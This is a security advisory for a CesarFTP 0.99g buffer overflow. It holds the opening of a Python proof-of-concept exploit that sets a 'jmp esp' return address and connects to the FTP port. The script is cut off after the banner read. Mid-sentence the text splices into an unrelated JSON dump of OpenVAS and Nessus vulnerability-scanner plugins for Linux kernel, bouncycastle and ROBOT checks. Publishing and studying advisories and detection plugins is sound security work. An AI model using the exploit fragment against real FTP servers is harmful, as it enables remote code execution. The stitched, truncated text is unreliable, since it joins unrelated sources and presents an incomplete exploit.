ID SECURITYVULNS:DOC:13098 Type securityvulns Reporter Securityvulns Modified 2006-06-11T00:00:00
Description
The following security advisory is sent to the securiteam mailing list, and can be found at the
SecuriTeam web site: http://www.securiteam.com
CesarFTP Buffer Overflow (Exploit)
SUMMARY
"CesarFTP is an easy-to-use and fast to configure FTP server." (http://www.aclogic.com/)
Improper input validation in CesarFTP allows attackers to execute arbitrary code.
DETAILS
Vulnerable Systems:
 * CesarFTP version 0.99g
Exploit:
#!/usr/bin/python
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [h07@interia.pl]
#Date: 10.06.2006

from socket import *

def intel_order(i):
    # pack a 32-bit integer into four little-endian bytes (x86 byte order)
    a = chr(i % 256)
    i = i >> 8
    b = chr(i % 256)
    i = i >> 8
    c = chr(i % 256)
    i = i >> 8
    d = chr(i % 256)
    packed = "%c%c%c%c" % (a, b, c, d)
    return packed

host = "127.0.0.1"
port = 21
user = "h07"
password = "open"
EIP = 0x7CA58265 #jmp esp <shell32.dll XP sp2 polish>

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)  # FTP banner (Python 2 print statement)
ADDITIONAL INFORMATION
The information has been provided by h07 (h07@interia.pl).
An attacker could\nuse this to construct a malicious btrfs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-14609, CVE-2018-14610,\nCVE-2018-14611, CVE-2018-14612, CVE-2018-14613)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some situations.\nAn attacker could use this to construct a malicious HFS+ image that, when\nmounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem\nof the Linux kernel did not properly initialize new files in some\nsituations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the Option USB High Speed driver\nin the Linux kernel did not properly validate metadata received from the\ndevice. A physically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19985)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux\nkernel did not properly handle size checks when handling an extra USB\ndescriptor. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2018-20169)\n\nZhipeng Xie discovered that an infinite loop could triggered in the CFS\nLinux kernel process scheduler. A local attacker could possibly use this to\ncause a denial of service. (CVE-2018-20784)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. A\nlocal attacker could possi ...\n\n Description truncated. 
Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'linux-aws' package(s) on Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1047-aws\", ver:\"4.15.0-1047.49\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.15.0.1047.46\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1047-aws\", ver:\"4.15.0-1047.49~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-aws-hwe\", ver:\"4.15.0.1047.47\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-15T14:39:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14609", "CVE-2018-13053", "CVE-2018-14610", "CVE-2018-13096", "CVE-2018-13098", "CVE-2019-12984", "CVE-2018-13100", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2018-13099", "CVE-2019-13272", "CVE-2018-16862", "CVE-2018-14614", "CVE-2019-12614", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2018-14612", "CVE-2019-2024", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-3846", "CVE-2018-20169", 
"CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-1125", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613"], "description": "The remote host is missing an update for the ", "modified": "2019-08-14T00:00:00", "published": "2019-08-14T00:00:00", "id": "OPENVAS:1361412562310844133", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844133", "type": "openvas", "title": "Ubuntu Update for linux USN-4094-1", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844133\");\n script_version(\"2019-08-14T07:16:43+0000\");\n script_cve_id(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13097\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14614\", \"CVE-2018-14616\", \"CVE-2018-13096\", \"CVE-2018-13098\", \"CVE-2018-14615\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14609\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-20169\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-10126\", \"CVE-2019-1125\", \"CVE-2019-12614\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3846\", \"CVE-2018-20511\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-08-14 07:16:43 +0000 (Wed, 14 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-14 02:02:14 +0000 (Wed, 14 Aug 2019)\");\n script_name(\"Ubuntu Update for linux USN-4094-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4094-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-August/005063.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is 
missing an update for the 'linux'\n package(s) announced via the USN-4094-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the alarmtimer implementation in the Linux kernel\ncontained an integer overflow vulnerability. A local attacker could use\nthis to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use this\nto construct a malicious XFS image that, when mounted, could cause a denial\nof service (system crash). (CVE-2018-13093)\n\nThe f2fs file system implementation in the Linux kernel did not properly\nvalidate metadata. An attacker could use this to construct a malicious\nf2fs image that, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13097, CVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616,\nCVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nbtrfs file system implementation in the Linux kernel did not\nproperly validate metadata. An attacker could use this to construct\na malicious btrfs image that, when mounted, could cause a denial of service\n(system crash). (CVE-2018-14610, CVE-2018-14611, CVE-2018-14612,\nCVE-2018-14613, CVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some situations.\nAn attacker could use this to construct a malicious HFS+ image that, when\nmounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem\nof the Linux kernel did not properly initialize new files in some\nsituations. A local attacker could use this to expose sensitive\ninformation. 
(CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux\nkernel did not properly handle size checks when handling an extra USB\ndescriptor. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth implementation in\nthe Linux kernel did not properly validate elliptic curve parameters during\nDiffie-Hellman key exchange in some situations. An attacker could use this\nto expose sensitive information. (CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'linux' package(s) on Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1021-oracle\", ver:\"4.15.0-1021.23\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1040-gcp\", ver:\"4.15.0-1040.42\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1040-gke\", ver:\"4.15.0-1040.42\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isdpkgvuln(pkg:\"linux-image-4.15.0-1042-kvm\", ver:\"4.15.0-1042.42\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1043-raspi2\", ver:\"4.15.0-1043.46\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1050-oem\", ver:\"4.15.0-1050.57\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1060-snapdragon\", ver:\"4.15.0-1060.66\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-generic\", ver:\"4.15.0-58.64\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-generic-lpae\", ver:\"4.15.0-58.64\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-lowlatency\", ver:\"4.15.0-58.64\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1040.42\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1040.43\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gke-4.15\", ver:\"4.15.0.1040.43\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.15.0.1042.42\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-oem\", 
ver:\"4.15.0.1050.54\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-oracle\", ver:\"4.15.0.1021.24\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.15.0.1043.41\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.15.0.1060.63\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-virtual\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1021-oracle\", ver:\"4.15.0-1021.23~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1040-gcp\", ver:\"4.15.0-1040.42~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1055-azure\", ver:\"4.15.0-1055.60\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-generic\", ver:\"4.15.0-58.64~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isdpkgvuln(pkg:\"linux-image-4.15.0-58-generic-lpae\", ver:\"4.15.0-58.64~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-lowlatency\", ver:\"4.15.0-58.64~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.15.0.1055.58\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1040.54\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.15.0.58.79\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.15.0.58.79\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1040.54\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.15.0.58.79\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.15.0.58.79\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-oracle\", ver:\"4.15.0.1021.15\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-virtual-hwe-16.04\", ver:\"4.15.0.58.79\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-05-08T19:32:22", "description": "This update for bouncycastle fixes the following issues :\n\nVersion update to 1.60 :\n\n - CVE-2018-1000613: Use of Externally-ControlledInput to\n Select Classes or Code (boo#1100694)\n\n - Release notes:\n 
http://www.bouncycastle.org/releasenotes.html\n\nVersion update to 1.59 :\n\n - CVE-2017-13098: Fix against Bleichenbacher oracle when\n not using the lightweight APIs (boo#1072697).\n\n - Release notes:\n http://www.bouncycastle.org/releasenotes.html", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-04T00:00:00", "title": "openSUSE Security Update : bouncycastle (openSUSE-2020-607)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1000613", "CVE-2017-13098"], "modified": "2020-05-04T00:00:00", "cpe": ["cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:bouncycastle", "p-cpe:/a:novell:opensuse:bouncycastle-javadoc"], "id": "OPENSUSE-2020-607.NASL", "href": "https://www.tenable.com/plugins/nessus/136317", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-607.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136317);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\"CVE-2017-13098\", \"CVE-2018-1000613\");\n\n script_name(english:\"openSUSE Security Update : bouncycastle (openSUSE-2020-607)\");\n script_summary(english:\"Check for the openSUSE-2020-607 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bouncycastle fixes the following issues :\n\nVersion update to 1.60 :\n\n - CVE-2018-1000613: Use of Externally-ControlledInput to\n Select Classes or Code (boo#1100694)\n\n - Release notes:\n http://www.bouncycastle.org/releasenotes.html\n\nVersion update to 1.59 :\n\n - CVE-2017-13098: Fix against Bleichenbacher oracle when\n not using 
the lightweight APIs (boo#1072697).\n\n - Release notes:\n http://www.bouncycastle.org/releasenotes.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.bouncycastle.org/releasenotes.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1072697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100694\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bouncycastle packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"bouncycastle-1.60-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"bouncycastle-javadoc-1.60-lp151.3.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bouncycastle / bouncycastle-javadoc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-16T04:24:15", "description": "The remote host is affected by an information disclosure\nvulnerability. The SSL/TLS service supports RSA key exchanges, and\nincorrectly leaks whether or not the RSA key exchange sent by a client\nwas correctly formatted. 
This information can allow an attacker to\ndecrypt previous SSL/TLS sessions or impersonate the server.\n\nNote that this plugin does not attempt to recover an RSA ciphertext,\nhowever it sends a number of correct and malformed RSA ciphertexts as\npart of an SSL handshake and observes how the server responds.\n\nThis plugin attempts to discover the vulnerability in multiple ways,\nby not completing the handshake and by completing it incorrectly, as\nwell as using a variety of cipher suites. Only the first method that\nfinds the service to be vulnerable is reported.\n\nThis plugin requires report paranoia as some services will\nreport as affected even though the issue is not exploitable.", "edition": 19, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-11-08T00:00:00", "title": "Return Of Bleichenbacher's Oracle Threat (ROBOT) Information Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6168", "CVE-2012-5081", "CVE-2017-13099", "CVE-2017-17382", "CVE-2017-1000385", "CVE-2017-17428", "CVE-2016-6883", "CVE-2017-17427", "CVE-2017-13098", "CVE-2017-12373"], "modified": "2019-11-08T00:00:00", "cpe": [], "id": "SSL_ROBOT_BLEICHENBACHER.NASL", "href": "https://www.tenable.com/plugins/nessus/105415", "sourceData": "#TRUSTED\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105415);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\n \"CVE-2012-5081\",\n \"CVE-2016-6883\",\n \"CVE-2017-6168\",\n \"CVE-2017-12373\",\n \"CVE-2017-13098\",\n \"CVE-2017-13099\",\n \"CVE-2017-17382\",\n \"CVE-2017-17427\",\n \"CVE-2017-17428\",\n \"CVE-2017-1000385\"\n );\n\n script_name(english:\"Return Of Bleichenbacher's Oracle Threat (ROBOT) Information Disclosure\");\n script_summary(english:\"Checks if the server leaks 
whether an RSA ciphertext is correctly formatted\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The server leaks whether or not an RSA-encrypted ciphertext is\nformatted correctly.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by an information disclosure\nvulnerability. The SSL/TLS service supports RSA key exchanges, and\nincorrectly leaks whether or not the RSA key exchange sent by a client\nwas correctly formatted. This information can allow an attacker to\ndecrypt previous SSL/TLS sessions or impersonate the server.\n\nNote that this plugin does not attempt to recover an RSA ciphertext,\nhowever it sends a number of correct and malformed RSA ciphertexts as\npart of an SSL handshake and observes how the server responds.\n\nThis plugin attempts to discover the vulnerability in multiple ways,\nby not completing the handshake and by completing it incorrectly, as\nwell as using a variety of cipher suites. Only the first method that\nfinds the service to be vulnerable is reported.\n\nThis plugin requires report paranoia as some services will\nreport as affected even though the issue is not exploitable.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://robotattack.org/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K21905460\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX230238\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171212-bleichenbacher\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?953be8c5\");\n script_set_attribute(attribute:\"see_also\", value:\"http://erlang.org/pipermail/erlang-questions/2017-November/094257.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a patched version of the software. 
Alternatively, disable\nRSA key exchanges.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-17428\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
